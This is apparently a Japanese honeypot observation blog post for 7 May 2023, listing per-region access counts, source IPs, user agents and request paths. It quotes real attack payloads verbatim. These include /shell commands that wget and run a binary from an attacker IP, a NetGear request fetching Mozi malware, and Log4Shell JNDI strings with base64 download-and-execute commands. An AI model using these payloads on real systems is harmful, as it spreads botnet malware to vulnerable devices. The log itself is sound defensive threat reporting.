2023/05/07 ハニーポット(仮) 観測記録 - コンニチハレバレトシタアオゾラ

ハニーポット(仮) 観測記録 2023/05/07分です。

特徴

共通

GPONルータの脆弱性を狙うアクセス
Spring Bootの脆弱性を狙うアクセス
zgrabによるスキャン行為
/.envへのスキャン行為

Location:JP

Apache Log4j2の脆弱性(CVE-2021-44228)を狙うアクセス
NetGear製品の脆弱性を狙うアクセス
aiohttpによるスキャン行為
.jsへのスキャン行為
/.awsへのスキャン行為
/.gitへのスキャン行為
WordPressへのスキャン行為
UserAgentがHello, Worldであるアクセス

を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget  109.205.213.3/bins/UnHAnaAW.arm4;
chmod 777 /tmp/UnHAnaAW.arm4;
sh /tmp/UnHAnaAW.arm4

Location:US

D-link製品の脆弱性を狙うアクセス
Spring Cloud Gatewayの脆弱性(CVE-2022-22947)を狙うアクセス
CensysInspectによるスキャン行為
Nmap Scripting Engineによるスキャン行為
TurnitinBotによるスキャン行為
phpMyAdminへのスキャン行為

を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget  109.205.213.3/bins/UnHAnaAW.arm;
chmod 777 /tmp/UnHAnaAW.arm;
sh /tmp/UnHAnaAW.arm

Location:UK

D-link製品の脆弱性を狙うアクセス
Spring Cloud Gatewayの脆弱性(CVE-2022-22947)を狙うアクセス
CensysInspectによるスキャン行為
WordPress Pluginへのスキャン行為

を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget  109.205.213.3/bins/UnHAnaAW.arm4;
chmod 777 /tmp/UnHAnaAW.arm4;
sh /tmp/UnHAnaAW.arm4

Location:SG

D-link製品の脆弱性を狙うアクセス
Spring Cloud Gatewayの脆弱性(CVE-2022-22947)を狙うアクセス
CensysInspectによるスキャン行為
Nmap Scripting Engineによるスキャン行為
UserAgentがHello, Worldであるアクセス

を確認しました。

他

アクセス数推移

JP：総アクセス数：242 (前日比：115)
US：総アクセス数：86 (前日比：1)
UK：総アクセス数：74 (前日比：-1)
SG：総アクセス数：134 (前日比：-149)

都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。

Location:JP

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	3.16.165.53	United States
1	3.235.245.114	United States
1	4.231.206.188	United States
1	18.184.218.162	United States
3	20.201.120.35	United States
1	34.219.166.20	United States
1	35.81.163.43	United States
3	43.128.79.158	Singapore
19	43.154.141.71	Singapore
1	45.56.108.128	United States
1	45.79.181.179	United States
2	45.79.181.223	United States
1	49.143.32.6	South Korea
2	54.203.68.15	United States
145	54.254.198.117	United States
2	63.214.171.26	United States
1	64.62.197.212	United States
1	64.62.197.222	United States
1	66.175.213.4	United States
2	67.129.123.70	United States
2	80.76.51.246	Bulgaria
2	87.121.221.49	Bulgaria
2	93.160.62.190	Denmark
1	104.192.0.50	United States
1	107.172.233.156	United States
1	109.205.213.38	Azerbaijan
2	109.237.98.226	Russia
1	117.215.252.187	India
1	124.239.133.128	China
1	134.122.133.97	Singapore
8	135.125.217.54	France
8	135.125.246.189	France
1	157.122.175.111	China
1	159.203.224.11	United States
2	172.104.11.4	United States
2	172.104.11.51	United States
1	172.105.128.11	United States
1	181.214.242.56	United States
2	185.32.164.145	Russia
1	185.254.196.173	Ukraine
1	185.254.196.186	Ukraine
2	188.119.51.126	Turkey
1	192.155.90.220	United States
1	192.241.225.21	United States
1	193.35.18.251	Bulgaria
1	198.199.101.132	United States
1	205.210.31.37	United States
2	209.201.15.190	United States
1	212.224.93.194	Germany

UserAgent一覧

件数	UserAgent
15	`-`
1	`Go-http-client/1.1`
1	`Hello, World`
2	`Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.82 Safari/537.36 OPR/29.0.1795.41`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36`
1	`Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/125.2 (KHTML, like Gecko) Safari/85.8`
19	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; rv:108.0) Gecko/20100101 Firefox/108.0`
1	`Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36`
181	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
3	`Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0`
1	`Mozilla/5.0 (compatible; Konqueror/4.5; Windows) KHTML/4.5.4 (like Gecko)`
1	`Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1`
2	`Mozilla/5.0 zgrab/0.x`
1	`Mozilla/5.0`
2	`Python-urllib/3.10`
1	`Python/3.7 aiohttp/3.7.4.post0`
1	`python-requests/2.25.1`
1	t('${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//104[.]248[.]62[.]142:1389/TomcatBypass/Command/Base64/Y2QgL3RtcCB8fCBjZCAvdmFyL3J1biB8fCBjZCAvbW50IHx8IGNkIC9yb290IHx8IGNkIC87IHdnZXQgaHR0cDovLzEwNC4yNDguNjIuMTQyL2JpbnMuc2g7IGNobW9kIDc3NyBiaW5zLnNoOyBzaCBiaW5zLnNoOyB0ZnRwIDEwNC4yNDguNjIuMTQyIC1jIGdldCB0ZnRwMS5zaDsgY2htb2QgNzc3IHRmdHAxLnNoOyBzaCB0ZnRwMS5zaDsgdGZ0cCAtciB0ZnRwMi5zaCAtZyAxMDQuMjQ4LjYyLjE0MjsgY2htb2QgNzc3IHRmdHAyLnNoOyBzaCB0ZnRwMi5zaDsgZnRwZ2V0IC12IC11IGFub255bW91cyAtcCBhbm9ueW1vdXMgLVAgMjEgMTA0LjI0OC42Mi4xNDIgZnRwMS5zaCBmdHAxLnNoOyBzaCBmdHAxLnNoIHRmdHAxLnNoIHRmdHAyLnNoIGZ0cDEuc2g7IHJtIC1yZiAq}')
2	`t('${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//167[.]99[.]144[.]56:1389/TomcatBypass/Command/Base64/Y2QgL3RtcCB8fCBjZCAvdmFyL3J1biB8fCBjZCAvbW50IHx8IGNkIC9yb290IHx8IGNkIC87IHdnZXQgaHR0cDovLzE2Ny45OS4xNDQuNTYvc2tpZC5zaDsgY2htb2QgNzc3IHNraWQuc2g7IHNoIHNraWQuc2g7IHRmdHAgMTY3Ljk5LjE0NC41NiAtYyBnZXQgdGZ0cDEuc2g7IGNobW9kIDc3NyB0ZnRwMS5zaDsgc2ggdGZ0cDEuc2g7IHRmdHAgLXIgdGZ0cDIuc2ggLWcgMTY3Ljk5LjE0NC41NjsgY2htb2QgNzc3IHRmdHAyLnNoOyBzaCB0ZnRwMi5zaDsgcm0gLXJmICo=}')`

リクエスト内容一覧

件数	Method	Request	Protocol
1		`MGLNDD_18.179.20.5_80\n`
1		`\x16\x03\x01\x01H\x01`
11		`\x16\x03\x01`
1	GET	`/.aws/credentials`	HTTP/1.1
1	GET	`/.docker/.env`	HTTP/1.1
1	GET	`/.docker/laravel/app/.env`	HTTP/1.1
1	GET	`/.env.backup`	HTTP/1.1
1	GET	`/.env.dev`	HTTP/1.1
1	GET	`/.env.dist`	HTTP/1.1
1	GET	`/.env.example`	HTTP/1.1
1	GET	`/.env.local`	HTTP/1.1
1	GET	`/.env.save`	HTTP/1.1
1	GET	`/.env.stage`	HTTP/1.1
1	GET	`/.env.www`	HTTP/1.1
1	GET	`/.env_1`	HTTP/1.1
26	GET	`/.env`	HTTP/1.1
1	GET	`/.envs`	HTTP/1.1
1	GET	`/.env~`	HTTP/1.1
2	GET	`/.git/HEAD`	HTTP/1.1
1	GET	`/.git/config`	HTTP/1.1
1	GET	`/.gitlab-ci/.env`	HTTP/1.1
2	GET	`/.hg/hgrc`	HTTP/1.1
1	GET	`/.s3cfg`	HTTP/1.1
1	GET	`/.vscode/.env`	HTTP/1.1
1	GET	`/.wp-config.php.swp`	HTTP/1.1
1	GET	`/:80:undefined?id=`	HTTP/1.1
2	GET	`/:undefined?id=`	HTTP/1.1
1	GET	`/_phpinfo.php`	HTTP/1.1
4	GET	`/_profiler/phpinfo`	HTTP/1.1
1	GET	`/actuator/health`	HTTP/1.1
1	GET	`/admin-app/.env`	HTTP/1.1
1	GET	`/admin/.env`	HTTP/1.1
1	GET	`/admin/dashboard/info.php`	HTTP/1.1
1	GET	`/admin/phpinfo.php`	HTTP/1.1
1	GET	`/alpha/.env`	HTTP/1.1
1	GET	`/api/.env`	HTTP/1.1
1	GET	`/api/phpinfo.php`	HTTP/1.1
1	GET	`/api/src/.env`	HTTP/1.1
1	GET	`/api/src`	HTTP/1.1
1	GET	`/apis/.env`	HTTP/1.1
1	GET	`/app/.env`	HTTP/1.1
1	GET	`/app/config/.env`	HTTP/1.1
1	GET	`/app/config/dev/.env`	HTTP/1.1
1	GET	`/apps/.env`	HTTP/1.1
1	GET	`/assets/.env`	HTTP/1.1
1	GET	`/back/.env`	HTTP/1.1
1	GET	`/backend/.env`	HTTP/1.1
1	GET	`/beta/.env`	HTTP/1.1
1	GET	`/blog/.env`	HTTP/1.1
1	GET	`/bootstrap/.env`	HTTP/1.1
1	GET	`/cdn-cgi/trace`	HTTP/1.1
1	GET	`/cgi-bin/.env`	HTTP/1.1
1	GET	`/check.php`	HTTP/1.1
1	GET	`/client/.env`	HTTP/1.1
1	GET	`/config.env`	HTTP/1.1
1	GET	`/config.js`	HTTP/1.1
1	GET	`/config.json`	HTTP/1.1
1	GET	`/config/.env`	HTTP/1.1
1	GET	`/configuration.php`	HTTP/1.1
1	GET	`/content/.env`	HTTP/1.1
1	GET	`/core/.env`	HTTP/1.1
1	GET	`/cp/.env`	HTTP/1.1
1	GET	`/crm/.env.production`	HTTP/1.1
1	GET	`/d/.env`	HTTP/1.1
1	GET	`/dashboard/phpinfo.php`	HTTP/1.1
1	GET	`/dashboard/test.php`	HTTP/1.1
1	GET	`/database/.env`	HTTP/1.1
1	GET	`/debug/default`	HTTP/1.1
1	GET	`/demo/.env`	HTTP/1.1
1	GET	`/dev/.env`	HTTP/1.1
1	GET	`/develop/info.php`	HTTP/1.1
1	GET	`/development/.env`	HTTP/1.1
1	GET	`/docs/.env`	HTTP/1.1
1	GET	`/download/.env`	HTTP/1.1
1	GET	`/en/.env`	HTTP/1.1
1	GET	`/env/.env`	HTTP/1.1
1	GET	`/environment`	HTTP/1.1
1	GET	`/envrc`	HTTP/1.1
1	GET	`/export/.env`	HTTP/1.1
2	GET	`/favicon.ico`	HTTP/1.1
1	GET	`/files/.env`	HTTP/1.1
1	GET	`/frontend_dev.php/$`	HTTP/1.1
1	GET	`/geoserver/web/`	HTTP/1.1
1	GET	`/home/.env`	HTTP/1.1
1	GET	`/hudson`	HTTP/1.1
1	GET	`/i.php`	HTTP/1.1
1	GET	`/icons/.env`	HTTP/1.1
1	GET	`/images/.env`	HTTP/1.1
1	GET	`/img/.env`	HTTP/1.1
1	GET	`/index.js`	HTTP/1.1
1	GET	`/index.php`	HTTP/1.1
2	GET	`/info.php`	HTTP/1.1
1	GET	`/info/phpinfo.php`	HTTP/1.1
1	GET	`/info1.php`	HTTP/1.1
1	GET	`/kyc/.env`	HTTP/1.1
1	GET	`/laravel/.env`	HTTP/1.1
1	GET	`/laravel/core/.env`	HTTP/1.1
1	GET	`/lib/.env`	HTTP/1.1
1	GET	`/live/.env.staging`	HTTP/1.1
1	GET	`/local-phpinfo.php`	HTTP/1.1
1	GET	`/local/.env`	HTTP/1.1
1	GET	`/login/.env`	HTTP/1.1
1	GET	`/mailer/.env`	HTTP/1.1
1	GET	`/manual/.env`	HTTP/1.1
1	GET	`/media/.env`	HTTP/1.1
1	GET	`/old/.env`	HTTP/1.1
1	GET	`/p.php`	HTTP/1.1
1	GET	`/php-info.php`	HTTP/1.1
1	GET	`/php-info`	HTTP/1.1
1	GET	`/php.ini`	HTTP/1.1
1	GET	`/php.php`	HTTP/1.1
1	GET	`/php/phpinfo.php`	HTTP/1.1
1	GET	`/php_info.php`	HTTP/1.1
1	GET	`/phpinfo.php`	HTTP/1.1
1	GET	`/phpinfo/phpinfo.php`	HTTP/1.1
1	GET	`/phpinfo`	HTTP/1.1
1	GET	`/phptest.php`	HTTP/1.1
1	GET	`/pi.php`	HTTP/1.1
1	GET	`/private/.env`	HTTP/1.1
1	GET	`/prod/.env`	HTTP/1.1
2	GET	`/public/.env`	HTTP/1.1
1	GET	`/results/.env`	HTTP/1.1
1	GET	`/root/infophp`	HTTP/1.1
1	GET	`/script/.env`	HTTP/1.1
1	GET	`/scripts/.env`	HTTP/1.1
1	GET	`/server/.env`	HTTP/1.1
1	GET	`/server/phpinfo.php`	HTTP/1.1
1	GET	`/services/.env`	HTTP/1.1
1	GET	`/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//117[.]215[.]252[.]187:48250/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1`	HTTP/1.0
2	GET	`/shared/.env`	HTTP/1.1
1	GET	`/shell?cd+/tmp;rm+-rf+*;wget+ 109.205.213.3/bins/UnHAnaAW.arm4;chmod+777+/tmp/UnHAnaAW.arm4;sh+/tmp/UnHAnaAW.arm4`
1	GET	`/site/.env`	HTTP/1.1
1	GET	`/src/.env`	HTTP/1.1
1	GET	`/staging/.env`	HTTP/1.1
1	GET	`/static/.env`	HTTP/1.1
1	GET	`/storage/.env`	HTTP/1.1
1	GET	`/system/.env`	HTTP/1.1
1	GET	`/systembc/password.php`	HTTP/1.0
1	GET	`/temp.php`	HTTP/1.1
1	GET	`/test.php`	HTTP/1.1
1	GET	`/test/.env`	HTTP/1.1
1	GET	`/test1.php`	HTTP/1.1
1	GET	`/test2.php`	HTTP/1.1
1	GET	`/testing.php`	HTTP/1.1
1	GET	`/testphpinfo`	HTTP/1.1
1	GET	`/tools/info.php`	HTTP/1.1
2	GET	`/uploads/.env`	HTTP/1.1
1	GET	`/v2/.env`	HTTP/1.1
1	GET	`/v3/time`	HTTP/1.1
1	GET	`/vod/3383.html`	HTTP/1.1
1	GET	`/web/.env`	HTTP/1.1
1	GET	`/website/.env`	HTTP/1.1
1	GET	`/wp-config.backup`	HTTP/1.1
1	GET	`/wp-config.bak`	HTTP/1.1
1	GET	`/wp-config.orig`	HTTP/1.1
1	GET	`/wp-config.php.`	HTTP/1.1
1	GET	`/wp-config.php.bak`	HTTP/1.1
1	GET	`/wp-config.php.bk`	HTTP/1.1
1	GET	`/wp-config.php.orig`	HTTP/1.1
1	GET	`/wp-config.php.save`	HTTP/1.1
1	GET	`/wp-config.php_`	HTTP/1.1
1	GET	`/wp-config.php_bk`	HTTP/1.1
1	GET	`/wp-config.php_old`	HTTP/1.1
1	GET	`/wp-config.php_orig`	HTTP/1.1
1	GET	`/wp-config.php`	HTTP/1.1
1	GET	`/wp-config.php~`	HTTP/1.1
1	GET	`/yuuki?pp=env`	HTTP/1.1
19	HEAD	`/Core/Skin/Login.aspx`	HTTP/1.1
1	POST	`/GponForm/diag_Form?images/`	HTTP/1.1
3	POST	`/boaform/admin/formLogin`	HTTP/1.1
1	POST	`/cgi-bin`	HTTP/1.1
1	POST	`/database`	HTTP/1.1
1	POST	`/old`	HTTP/1.1
1	POST	`/public`	HTTP/1.1
1	POST	`/shared`	HTTP/1.1
1	POST	`/uploads`	HTTP/1.1

Location:US

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	34.219.166.20	United States
1	35.81.163.43	United States
1	38.91.106.78	United States
1	45.33.80.243	United States
1	45.79.181.94	United States
1	45.79.181.223	United States
1	45.79.181.251	United States
2	45.227.254.48	Belize
1	51.158.37.186	France
24	54.37.79.75	France
1	87.121.221.49	Bulgaria
6	95.214.27.204	Bulgaria
1	103.187.191.128	private ip address
1	103.187.191.164	private ip address
1	103.187.191.165	private ip address
1	103.187.191.183	private ip address
1	107.170.208.7	United States
1	107.175.65.133	United States
1	109.205.213.41	Azerbaijan
2	152.89.196.144	Russia
2	167.94.138.124	United States
2	167.94.146.58	United States
3	172.104.11.4	United States
1	172.104.11.46	United States
1	172.105.128.11	United States
1	172.105.128.13	United States
1	179.43.177.243	Panama
2	184.105.247.194	United States
2	192.155.90.220	United States
1	192.241.193.13	United States
1	192.241.198.51	United States
1	193.35.18.61	Bulgaria
3	193.35.18.65	Bulgaria
2	193.35.18.125	Bulgaria
2	193.35.18.251	Bulgaria
1	193.203.203.71	Moldova
1	198.199.118.130	United States
1	198.235.24.5	United States
1	205.210.31.28	United States
1	209.97.164.8	United States
5	212.224.93.195	Germany
1	219.78.91.237	Hong Kong

UserAgent一覧

件数	UserAgent
27	`-`
4	`Mozila/5.0`
1	`Mozilla/4.0 (PSP (PlayStation Portable); 2.00)`
1	`Mozilla/5.0 (Linux; U; Android 1.5; de-de; HTC Magic Build/PLAT-RC33) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 FirePHP/0.3`
1	`Mozilla/5.0 (Linux; U; Android 10; zh-Hans-CN; SPN-AL00 Build/HUAWEISPN-AL00) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/78.0.3904.108 Quark/5.4.9.201 Mobile Safari/537.36`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4889.0 Safari/537.36`
2	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0`
1	`Mozilla/5.0 (Windows NT 10.0; rv:110.0) Gecko/20100101 Firefox/110.0`
27	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
1	`Mozilla/5.0 (X11; Linux x86_64; rv:104.0) Gecko/20100101 Firefox/104.0`
1	`Mozilla/5.0 (X11; U; SunOS sun4m; en-US; rv:1.4b) Gecko/20030517 Mozilla Firebird/0.6`
7	`Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0`
2	`Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)`
4	`Mozilla/5.0 (compatible; Nmap Scripting Engine; https[:]//nmap[.]org/book/nse.html)`
3	`Mozilla/5.0 zgrab/0.x`
1	`TurnitinBot (https[:]//turnitin[.]com/robot/crawlerinfo.html)`

リクエスト内容一覧

件数	Method	Request	Protocol
1		`MGLNDD_34.68.118.83_80\n`
2		`\x03`
14		`\x16\x03\x01`
28	GET	`/.env`	HTTP/1.1
2	GET	`/.hg/hgrc`	HTTP/1.1
1	GET	`//MyAdmin/scripts/setup.php`	HTTP/1.1
1	GET	`//myadmin/scripts/setup.php`	HTTP/1.1
1	GET	`//phpMyAdmin/scripts/setup.php`	HTTP/1.1
1	GET	`//phpmyadmin/scripts/setup.php`	HTTP/1.1
1	GET	`//pma/scripts/setup.php`	HTTP/1.1
1	GET	`/?XDEBUG_SESSION_START=phpstorm`	HTTP/1.1
1	GET	`/HNAP1`	HTTP/1.1
1	GET	`/actuator/gateway/routes`	HTTP/1.1
1	GET	`/actuator/health`	HTTP/1.1
2	GET	`/docker-compose.yml`	HTTP/1.1
1	GET	`/evox/about`	HTTP/1.1
4	GET	`/favicon.ico`	HTTP/1.1
1	GET	`/geoserver/web/`	HTTP/1.1
1	GET	`/hudson`	HTTP/1.1
1	GET	`/info.php`	HTTP/1.1
1	GET	`/muieblackcat`	HTTP/1.1
1	GET	`/nmaplowercheck1683332244`	HTTP/1.1
1	GET	`/portal/redlion`	HTTP/1.1
1	GET	`/sendgrid.env`	HTTP/1.1
1	GET	`/shell?cd+/tmp;rm+-rf+*;wget+ 109.205.213.3/bins/UnHAnaAW.arm;chmod+777+/tmp/UnHAnaAW.arm;sh+/tmp/UnHAnaAW.arm`
4	POST	`/HNAP1/`	HTTP/1.1
1	POST	`/HNAP1/`	HTTP/1.0
7	POST	`/boaform/admin/formLogin`	HTTP/1.1
1	POST	`/sdk`	HTTP/1.1
2	PRI	`*`	HTTP/2.0

Location:UK

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	38.91.106.78	United States
1	43.130.126.24	Singapore
1	45.79.181.94	United States
1	45.79.181.104	United States
1	45.79.181.179	United States
2	45.79.181.223	United States
1	45.79.181.251	United States
1	45.88.66.48	Bulgaria
1	45.227.254.55	Belize
28	51.79.29.48	Canada
1	64.62.197.167	United States
1	64.62.197.175	United States
1	66.240.192.82	United States
1	87.121.221.49	Bulgaria
1	109.205.213.39	Azerbaijan
7	139.59.36.249	Singapore
2	152.89.196.144	Russia
2	162.142.125.223	United States
1	162.243.136.24	United States
1	162.243.145.8	United States
2	167.248.133.124	United States
1	172.104.11.4	United States
1	172.104.11.34	United States
1	172.104.11.46	United States
1	172.104.242.173	United States
1	172.105.128.13	United States
1	183.136.225.32	China
2	192.155.90.118	United States
1	192.241.215.17	United States
1	193.35.18.61	Bulgaria
1	193.35.18.65	Bulgaria
1	193.35.18.251	Bulgaria
1	194.165.16.76	Panama
1	198.199.97.153	United States
1	198.235.24.195	United States
1	205.210.31.144	United States

UserAgent一覧

件数	UserAgent
25	`-`
2	`Mozila/5.0`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 OPR/94.0.0.0 (Edition Yx GX)`
3	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36`
2	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE`
29	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
1	`Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/109.0`
3	`Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0`
2	`Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)`
3	`Mozilla/5.0 zgrab/0.x`
1	`Mozilla/5.0`
1	`python-requests/2.28.2`

リクエスト内容一覧

件数	Method	Request	Protocol
1		`MGLNDD_132.145.66.34_80\n`
2		`\x03`
18		`\x16\x03\x01`
1		`\xba\xabd\xa1EZC\xdbM\x87\xee^\xfd\xbf\x159`	X\xd4>\x12\x98\xc4<\xe0\x13\xcf
29	GET	`/.env`	HTTP/1.1
1	GET	`/?XDEBUG_SESSION_START=phpstorm`	HTTP/1.1
1	GET	`/actuator/gateway/routes`	HTTP/1.1
1	GET	`/actuator/health`	HTTP/1.1
1	GET	`/client/get_targets`	HTTP/1.1
5	GET	`/favicon.ico`	HTTP/1.1
1	GET	`/geoip/`	HTTP/1.1
1	GET	`/geoserver/web/`	HTTP/1.1
1	GET	`/hudson`	HTTP/1.1
1	GET	`/portal/redlion`	HTTP/1.1
1	GET	`/shell?cd+/tmp;rm+-rf+*;wget+ 109.205.213.3/bins/UnHAnaAW.arm4;chmod+777+/tmp/UnHAnaAW.arm4;sh+/tmp/UnHAnaAW.arm4`
1	GET	`/upl.php`	HTTP/1.1
1	GET	`/wp-content/plugins/wp-file-manager/readme.txt`	HTTP/1.1
2	POST	`/HNAP1/`	HTTP/1.1
3	POST	`/boaform/admin/formLogin`	HTTP/1.1
2	PRI	`*`	HTTP/2.0

Location:SG

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	1.81.195.184	China
2	4.1.229.86	United States
2	4.14.70.9	United States
2	4.17.224.131	United States
2	4.17.224.134	United States
1	4.154.83.105	United States
1	20.236.132.214	United States
1	27.74.240.14	Vietnam
1	43.130.126.24	Singapore
1	45.33.80.243	United States
1	45.55.0.11	United States
1	45.56.108.128	United States
1	45.79.172.21	United States
2	45.79.181.94	United States
1	45.79.181.223	United States
1	45.79.181.251	United States
1	45.227.254.8	Belize
27	54.37.79.75	France
1	60.29.208.118	China
2	63.214.171.26	United States
2	64.85.173.196	United States
2	68.66.164.26	United States
2	69.162.243.124	United States
2	69.194.182.221	United States
1	87.121.221.49	Bulgaria
4	103.60.60.186	Singapore
1	103.187.191.141	private ip address
1	103.187.191.147	private ip address
1	103.187.191.177	private ip address
1	103.187.191.193	private ip address
1	107.170.255.21	United States
3	115.78.10.124	Vietnam
4	117.7.131.77	Vietnam
1	117.84.207.23	China
1	134.122.133.58	Singapore
2	152.89.196.144	Russia
7	159.65.40.70	United States
1	159.203.208.19	United States
2	162.142.125.225	United States
1	172.104.11.34	United States
1	172.105.128.12	United States
3	172.105.128.13	United States
2	179.43.177.243	Panama
1	183.136.225.32	China
4	185.32.164.145	Russia
2	185.225.45.232	United Kingdom
6	188.119.51.126	Turkey
1	192.155.90.220	United States
1	192.241.207.91	United States
1	193.35.18.61	Bulgaria
1	193.35.18.65	Bulgaria
1	193.35.18.206	Bulgaria
2	193.35.18.251	Bulgaria
1	194.110.203.85	private ip address
2	202.73.34.226	Singapore
1	205.210.31.99	United States
1	205.210.31.131	United States
4	206.226.64.150	United States
4	212.154.7.246	Turkey
2	216.218.206.66	United States
1	218.72.215.45	China

UserAgent一覧

件数	UserAgent
22	`-`
2	`Hello, World`
2	`Mozila/5.0`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36`
3	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36`
2	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE`
82	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
1	`Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/109.0`
6	`Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0`
1	`Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)`
4	`Mozilla/5.0 (compatible; Nmap Scripting Engine; https[:]//nmap[.]org/book/nse.html)`
1	`Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1`
3	`Mozilla/5.0 zgrab/0.x`
1	`Mozilla/5.0`

リクエスト内容一覧

件数	Method	Request	Protocol
1		`-`
1		`MGLNDD_13.67.44.234_80`
1		`\x03`
17		`\x16\x03\x01`
30	GET	`/.env`	HTTP/1.1
1	GET	`/?XDEBUG_SESSION_START=phpstorm`	HTTP/1.1
1	GET	`/HNAP1`	HTTP/1.1
1	GET	`/actuator/gateway/routes`	HTTP/1.1
1	GET	`/actuator/health`	HTTP/1.1
1	GET	`/admin/.env`	HTTP/1.1
1	GET	`/app/.env`	HTTP/1.1
1	GET	`/apps/.env`	HTTP/1.1
1	GET	`/base/.env`	HTTP/1.1
1	GET	`/blogs/.env`	HTTP/1.1
1	GET	`/boaform/admin/formLogin?username=ec8&psd=ec8`	HTTP/1.0
1	GET	`/cgi-bin/.env`	HTTP/1.1
